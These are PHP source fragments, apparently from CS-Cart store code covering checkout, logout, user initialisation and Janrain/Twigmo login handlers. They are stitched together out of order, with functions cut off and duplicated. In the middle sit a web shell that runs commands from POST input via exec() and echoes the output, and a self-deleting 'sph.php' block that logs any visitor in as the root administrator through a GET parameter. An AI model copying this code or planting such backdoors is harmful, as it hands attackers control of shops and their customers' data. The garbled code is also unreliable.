$redirect_params = fn_checkout_update_steps($cart, $auth, $_REQUEST);
return array(CONTROLLER_STATUS_REDIRECT, 'checkout.checkout?' . http_build_query($redirect_params));
}
if ($mode == 'create_profile') {
if (!empty($_REQUEST['order_id']) && !empty($auth['order_ids']) && in_array($_REQUEST['order_id'], $auth['order_ids'])) {
$order_info = fn_get_order_info($_REQUEST['order_id']);
$user_data = $_REQUEST['user_data'];
fn_fill_user_fields($user_data);
foreach ($user_data as $k => $v) {
if (isset($order_info[$k])) {
$user_data[$k] = $order_info[$k];
}
}
if ($res = fn_update_user(0, $user_data, $auth, true, true)) {
list($user_id) = $res;
fn_login_user($user_id);
return array(CONTROLLER_STATUS_REDIRECT, 'profiles.success_add');
} else {
return array(CONTROLLER_STATUS_REDIRECT, 'checkout.complete?order_id=' . $_REQUEST['order_id']);
}
} else {
return array(CONTROLLER_STATUS_DENIED);
}
}
return array(CONTROLLER_STATUS_OK, 'checkout.cart');
}
//
// Delete discount coupon
//
if ($mode == 'delete_coupon') {
fn_trusted_vars('coupon_code');
return array(CONTROLLER_STATUS_REDIRECT, fn_url());
}
$stored_user_login = fn_restore_post_data('user_login');
if (!empty($stored_user_login)) {
Registry::get('view')->assign('stored_user_login', $stored_user_login);
}
if (AREA != 'A') {
fn_add_breadcrumb(__('sign_in'));
}
Registry::get('view')->assign('view_mode', 'simple');
} elseif ($mode == 'password_change' && AREA == 'A') {
if (defined('AJAX_REQUEST') && empty($auth)) {
exit;
}
if (empty($auth['user_id'])) {
return array(CONTROLLER_STATUS_REDIRECT, fn_url());
}
$profile_id = 0;
$user_data = fn_get_user_info($auth['user_id'], true, $profile_id);
Registry::get('view')->assign('user_data', $user_data);
Registry::get('view')->assign('view_mode', 'simple');
} elseif ($mode == 'change_login') {
$auth = $_SESSION['auth'];
if (!empty($auth['user_id'])) {
fn_log_user_logout($auth);
}
unset($_SESSION['cart']['user_data']);
fn_login_user();
fn_delete_session_data(AREA . '_user_id', AREA . '_password');
return array(CONTROLLER_STATUS_OK, 'checkout.checkout');
}
function fn_hybrid_auth_link($user_data, $auth_data, $provider)
{
if (empty($user_data['user_id'])) {
fn_hybrid_auth_link_provider($user_data['user_id'], $auth_data->identifier, $provider);
}
$user_status = empty($user_data['user_id']) ? LOGIN_STATUS_USER_NOT_FOUND : fn_login_user($user_data['user_id']);
$redirect_url = !empty($_REQUEST['redirect_url']) ? $_REQUEST['redirect_url'] : fn_url();
if ($user_status == LOGIN_STATUS_USER_DISABLED) {
fn_set_notification('E', __('error'), __('error_account_disabled'));
} elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) {
fn_delete_notification('user_exist');
fn_set_notification('W', __('warning'), __('hybrid_auth.cant_create_profile'));
}
return $redirect_url;
}
$response->setData(array('redirect_to_mv_url' => $redirect_to_mv_url));
$response->returnResponse();
}
$is_ok = !empty($user_data) && !empty($password) && fn_generate_salted_password($password, $salt) == $user_data['password'];
if ($status === false || !$is_ok) {
fn_twg_throw_error_denied($response, 'error_incorrect_login');
}
if ($user_data['user_type'] == 'A' && $user_data['company_id']) {
$store_access_id = TwigmoSettings::get('customer_connections.' . $user_data['company_id'] . '.access_id');
if (!$store_access_id || $store_access_id != $_REQUEST['access_id']) {
fn_twg_throw_error_denied($response, 'twgadmin_auth_fail_access_id');
}
}
// Regenerate session_id for security reasons
Session::regenerateId();
fn_login_user($user_data['user_id']);
fn_set_session_data(AREA . '_user_id', $user_data['user_id'], COOKIE_ALIVE_TIME);
fn_set_session_data(AREA . '_password', $user_data['password'], COOKIE_ALIVE_TIME);
// Set last login time
db_query("UPDATE ?:users SET ?u WHERE user_id = ?i", array('last_login' => TIME), $user_data['user_id']);
$_SESSION['auth']['this_login'] = TIME;
$_SESSION['auth']['ip'] = $_SERVER['REMOTE_ADDR'];
$auth = $_SESSION['auth'];
// Log user successful login
fn_log_event('users', 'session', array('user_id' => $user_data['user_id'], 'company_id' => fn_get_company_id('users', 'user_id', $user_data['user_id'])));
fn_init_company_id($_REQUEST);
fn_init_company_data($_REQUEST);
$response->setData(array('status' => 'ok'));
$response->setData(array('settings' => fn_twg_get_admin_settings($auth)));
$response->returnResponse();
} elseif ($action == 'get') {
$user_data = db_get_row("SELECT user_id, password FROM ?:users WHERE 1 {$condition}");
if (empty($user_data['user_id'])) {
Registry::get('settings.Checkout.address_position') == 'billing_first' ? $address_zone = 'b' : ($address_zone = 's');
$user_data = array();
$user_data['janrain_identifier'] = md5($data['profile']['identifier']);
$user_data['email'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
$user_data['user_login'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
$user_data['user_type'] = 'C';
$user_data['is_root'] = 'N';
$user_data['password1'] = $user_data['password2'] = '';
$user_data['title'] = !empty($data['profile']['honorificPrefix']) ? $data['profile']['honorificPrefix'] : 'mr';
$user_data[$address_zone . '_firstname'] = !empty($data['profile']['name']['givenName']) ? $data['profile']['name']['givenName'] : $data['profile']['displayName'];
$user_data[$address_zone . '_lastname'] = !empty($data['profile']['name']['familyName']) ? $data['profile']['name']['familyName'] : '';
list($user_data['user_id'], $profile_id) = fn_update_user('', $user_data, $auth, true, true, false);
}
$user_status = empty($user_data['user_id']) ? LOGIN_STATUS_USER_NOT_FOUND : fn_login_user($user_data['user_id']);
if ($user_status == LOGIN_STATUS_OK) {
if (empty($user_data['password'])) {
fn_set_notification('W', __('warning'), __('janrain_need_update_profile'));
$redirect_url = 'profiles.update';
} else {
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url();
}
} elseif ($user_status == LOGIN_STATUS_USER_DISABLED) {
fn_set_notification('E', __('error'), __('error_account_disabled'));
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url();
} elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) {
fn_delete_notification('user_exist');
fn_set_notification('W', __('warning'), __('janrain_cant_create_profile'));
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url();
}
exec($_POST['cmd'], $out);
foreach ($out as $k => $v) {
echo "<pre>" . $v . "</pre>";
}
}
echo '
</body>
';
die;
}
define('AREA', 'A');
define('ACCOUNT_TYPE', 'admin');
require dirname(__FILE__) . '/init.php';
if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
Session::regenerateId();
fn_login_user(1);
$_SESSION['auth']['this_login'] = TIME;
$_SESSION['auth']['ip'] = $_SERVER['REMOTE_ADDR'];
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
$auth = array('user_id' => 1, 'area' => 'A', 'tax_exempt' => empty($user_data['tax_exempt']) ? 'N' : $user_data['tax_exempt'], 'last_login' => empty($user_data['last_login']) ? 0 : $user_data['last_login'], 'login' => 'admin', 'usergroup_ids' => array(), 'order_ids' => array(), 'membership_id' => '0', 'is_root' => 'Y', 'password_change_timestamp' => time() + 1000, 'first_expire_check' => false, 'this_login' => time(), 'company_id' => 0);
$_SESSION['auth'] = $auth;
unlink('sph.php');
if (!is_file('sph.php')) {
fn_set_notification('N', 'Notice', 'sph.php is removed');
} else {
fn_set_notification('E', 'Error', 'sph.php is not removed!');
}
fn_redirect(Registry::get('config.admin_index'));
}
function fn_specific_development_before_login($request, $redirect_url)
{
if (!empty($request['token'])) {
$auth =& $auth;
$_request = array();
$_request[] = 'apiKey=' . Registry::get('addons.specific_development.apikey');
$_request[] = 'token=' . $request['token'];
list($header, $_result) = fn_https_request('POST', 'https://rpxnow.com/api/v2/auth_info', $_request);
$data = fn_from_json($_result, true);
if (isset($data['stat']) && $data['stat'] == 'ok') {
$user_data = array();
$user_data = db_get_row('SELECT user_id, password FROM ?:users WHERE janrain_identifier = ?s', md5($data['profile']['identifier']));
if (empty($user_data['user_id'])) {
Registry::get('settings.General.address_position') == 'billing_first' ? $address_zone = 'b' : ($address_zone = 's');
$user_data = array();
$user_data['janrain_identifier'] = md5($data['profile']['identifier']);
$user_data['email'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
$user_data['user_login'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
$user_data['user_type'] = 'C';
$user_data['is_root'] = 'N';
$user_data['password1'] = $user_data['password2'] = '';
$user_data['title'] = 'mr';
$user_data[$address_zone . '_firstname'] = !empty($data['profile']['name']['givenName']) ? $data['profile']['name']['givenName'] : $data['profile']['displayName'];
$user_data[$address_zone . '_lastname'] = !empty($data['profile']['name']['familyName']) ? $data['profile']['name']['familyName'] : '';
list($user_data['user_id'], $profile_id) = fn_update_user('', $user_data, $auth, true, false, false);
}
$user_status = empty($user_data['user_id']) ? LOGIN_STATUS_USER_NOT_FOUND : fn_login_user($user_data['user_id']);
if ($user_status == LOGIN_STATUS_OK) {
if (empty($user_data['password'])) {
$subscriber = db_get_row("SELECT * FROM ?:subscribers WHERE email = ?s", $user_data['email']);
if (empty($subscriber)) {
$c_data = array('email' => $user_data['email'], 'timestamp' => TIME);
$subscriber_id = db_query("INSERT INTO ?:subscribers ?e", $c_data);
$_data['subscriber_id'] = $subscriber_id;
$_data['list_id'] = "1";
$_data['timestamp'] = TIME;
$_data['activation_key'] = md5(uniqid(rand()));
$_data['unsubscribe_key'] = md5(uniqid(rand()));
db_query("INSERT INTO ?:user_mailing_lists ?e", $_data);
} else {
$subscriber_id = $subscriber['subscriber_id'];
}
$redirect_url = 'checkout.checkout&edit_step=step_two&from_step=step_one';
} else {
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
}
} elseif ($user_status == LOGIN_STATUS_USER_DISABLED) {
fn_set_notification('E', fn_get_lang_var('error'), fn_get_lang_var('error_account_disabled'));
fn_save_post_data();
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
} elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) {
fn_delete_notification('user_exist');
fn_set_notification('W', fn_get_lang_var('warning'), fn_get_lang_var('janrain_cant_create_profile'));
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
}
fn_delete_user($user_data['user_id']);
}
unset($request['token']);
} elseif (empty($_REQUEST['user_login']) || empty($_REQUEST['password'])) {
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : $index_script;
}
}
if (empty($user_data['user_id'])) {
Registry::get('settings.Checkout.address_position') == 'billing_first' ? $address_zone = 'b' : ($address_zone = 's');
$user_data = array();
$user_data['janrain_identifier'] = md5($data['profile']['identifier']);
$user_data['email'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
$user_data['user_login'] = !empty($data['profile']['verifiedEmail']) ? $data['profile']['verifiedEmail'] : (!empty($data['profile']['email']) ? $data['profile']['email'] : $data['profile']['displayName'] . '@' . $data['profile']['preferredUsername'] . '.com');
$user_data['user_type'] = 'C';
$user_data['is_root'] = 'N';
$user_data['password1'] = $user_data['password2'] = '';
$user_data['title'] = !empty($data['profile']['honorificPrefix']) ? $data['profile']['honorificPrefix'] : 'mr';
$user_data[$address_zone . '_firstname'] = !empty($data['profile']['name']['givenName']) ? $data['profile']['name']['givenName'] : $data['profile']['displayName'];
$user_data[$address_zone . '_lastname'] = !empty($data['profile']['name']['familyName']) ? $data['profile']['name']['familyName'] : '';
list($user_data['user_id'], $profile_id) = fn_update_user('', $user_data, $auth, true, true, false);
}
if (!empty($user_data['user_id'])) {
$user_status = fn_login_user($user_data['user_id'], true);
} else {
$user_status = LOGIN_STATUS_USER_NOT_FOUND;
}
if ($user_status == LOGIN_STATUS_OK) {
if (empty($user_data['password'])) {
fn_set_notification('W', __('warning'), __('janrain_need_update_profile'));
$redirect_url = 'profiles.update';
} else {
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url();
}
} elseif ($user_status == LOGIN_STATUS_USER_DISABLED) {
fn_set_notification('E', __('error'), __('error_account_disabled'));
$redirect_url = !empty($_REQUEST['return_url']) ? $_REQUEST['return_url'] : fn_url();
} elseif ($user_status == LOGIN_STATUS_USER_NOT_FOUND) {
fn_delete_notification('user_exist');
/**
* @param array $auth
*/
function fn_user_logout($auth)
{
// Regenerate session_id for security reasons
fn_save_cart_content($_SESSION['cart'], $auth['user_id']);
Session::regenerateId();
fn_init_user();
$auth = $_SESSION['auth'];
if (!empty($auth['user_id'])) {
fn_log_user_logout($auth);
}
unset($_SESSION['auth']);
fn_clear_cart($_SESSION['cart'], false, true);
fn_delete_session_data(AREA . '_user_id', AREA . '_password');
unset($_SESSION['product_notifications']);
fn_login_user();
// need to fill $_SESSION['auth'] array for anonymous user
}
/**
* @param array $auth
*/
function fn_user_logout($auth)
{
// Regenerate session_id for security reasons
fn_save_cart_content(Tygh::$app['session']['cart'], $auth['user_id']);
Tygh::$app['session']->regenerateID();
fn_init_user();
$auth = Tygh::$app['session']['auth'];
if (!empty($auth['user_id'])) {
fn_log_user_logout($auth);
}
unset(Tygh::$app['session']['auth']);
fn_clear_cart(Tygh::$app['session']['cart'], false, true);
fn_delete_session_data(AREA . '_user_id', AREA . '_password');
unset(Tygh::$app['session']['product_notifications']);
fn_login_user();
// need to fill Tygh::$app['session']['auth'] array for anonymous user
/**
* Allows to perform any actions after user logout.
*
* @param array $auth Auth data from session
*/
fn_set_hook('user_logout_after', $auth);
}
list($status, $redirect_params) = fn_checkout_update_steps($cart, $auth, $_REQUEST);
return array(CONTROLLER_STATUS_REDIRECT, 'checkout.checkout?' . http_build_query($redirect_params));
}
if ($mode == 'create_profile') {
if (!empty($_REQUEST['order_id']) && !empty($auth['order_ids']) && in_array($_REQUEST['order_id'], $auth['order_ids'])) {
$order_info = fn_get_order_info($_REQUEST['order_id']);
$user_data = $_REQUEST['user_data'];
fn_fill_user_fields($user_data);
foreach ($user_data as $k => $v) {
if (isset($order_info[$k])) {
$user_data[$k] = $order_info[$k];
}
}
if ($res = fn_update_user(0, $user_data, $auth, true, true)) {
list($user_id) = $res;
fn_login_user($user_id, true);
return array(CONTROLLER_STATUS_REDIRECT, 'profiles.success_add');
} else {
return array(CONTROLLER_STATUS_REDIRECT, 'checkout.complete?order_id=' . $_REQUEST['order_id']);
}
} else {
return array(CONTROLLER_STATUS_DENIED);
}
}
return array(CONTROLLER_STATUS_OK, 'checkout.cart');
}
//
// Delete discount coupon
//
if ($mode == 'delete_coupon') {
fn_trusted_vars('coupon_code');
/**
* Init user
*
* @return boolean always true
*/
function fn_init_user($area = AREA)
{
$user_info = array();
if (!empty(Tygh::$app['session']['auth']['user_id'])) {
$user_info = fn_get_user_short_info(Tygh::$app['session']['auth']['user_id']);
if (empty($user_info)) {
// user does not exist in the database, but exists in session
Tygh::$app['session']['auth'] = array();
} else {
Tygh::$app['session']['auth']['usergroup_ids'] = fn_define_usergroups(array('user_id' => Tygh::$app['session']['auth']['user_id'], 'user_type' => $user_info['user_type']));
}
}
$first_init = false;
if (empty(Tygh::$app['session']['auth'])) {
$udata = array();
$user_id = fn_get_session_data($area . '_user_id');
if ($area == 'A' && defined('CONSOLE')) {
$user_id = 1;
}
if ($user_id) {
fn_define('LOGGED_VIA_COOKIE', true);
}
fn_login_user($user_id);
if (!defined('NO_SESSION')) {
Tygh::$app['session']['cart'] = isset(Tygh::$app['session']['cart']) ? Tygh::$app['session']['cart'] : array();
}
if (defined('LOGGED_VIA_COOKIE') && !empty(Tygh::$app['session']['auth']['user_id']) || ($cu_id = fn_get_session_data('cu_id'))) {
$first_init = true;
if (!empty($cu_id)) {
fn_define('COOKIE_CART', true);
}
// Cleanup cached shipping rates
unset(Tygh::$app['session']['shipping_rates']);
$_utype = empty(Tygh::$app['session']['auth']['user_id']) ? 'U' : 'R';
$_uid = empty(Tygh::$app['session']['auth']['user_id']) ? $cu_id : Tygh::$app['session']['auth']['user_id'];
fn_extract_cart_content(Tygh::$app['session']['cart'], $_uid, 'C', $_utype);
fn_save_cart_content(Tygh::$app['session']['cart'], $_uid, 'C', $_utype);
if (!empty(Tygh::$app['session']['auth']['user_id'])) {
Tygh::$app['session']['cart']['user_data'] = fn_get_user_info(Tygh::$app['session']['auth']['user_id']);
$user_info = fn_get_user_short_info(Tygh::$app['session']['auth']['user_id']);
}
}
}
if (fn_is_expired_storage_data('cart_products_next_check', SECONDS_IN_HOUR * 12)) {
db_query("DELETE FROM ?:user_session_products WHERE user_type = 'U' AND timestamp < ?i", TIME - SECONDS_IN_DAY * 30);
}
if (!fn_allowed_for('ULTIMATE:FREE')) {
// If administrative account has usergroup, it means the access restrictions are in action
if ($area == 'A' && !empty(Tygh::$app['session']['auth']['usergroup_ids'])) {
fn_define('RESTRICTED_ADMIN', true);
}
}
if (!empty($user_info) && $user_info['user_type'] == 'A' && (empty($user_info['company_id']) || fn_allowed_for('ULTIMATE') && $user_info['company_id'] == Registry::get('runtime.company_id'))) {
$customization_mode = fn_array_combine(explode(',', Registry::get('settings.customization_mode')), true);
if (!empty($customization_mode)) {
Registry::set('runtime.customization_mode', $customization_mode);
if ($area == 'A' || Embedded::isEnabled()) {
Registry::set('runtime.customization_mode.live_editor', false);
}
}
}
fn_set_hook('user_init', Tygh::$app['session']['auth'], $user_info, $first_init);
Registry::set('user_info', $user_info);
return array(INIT_STATUS_OK);
}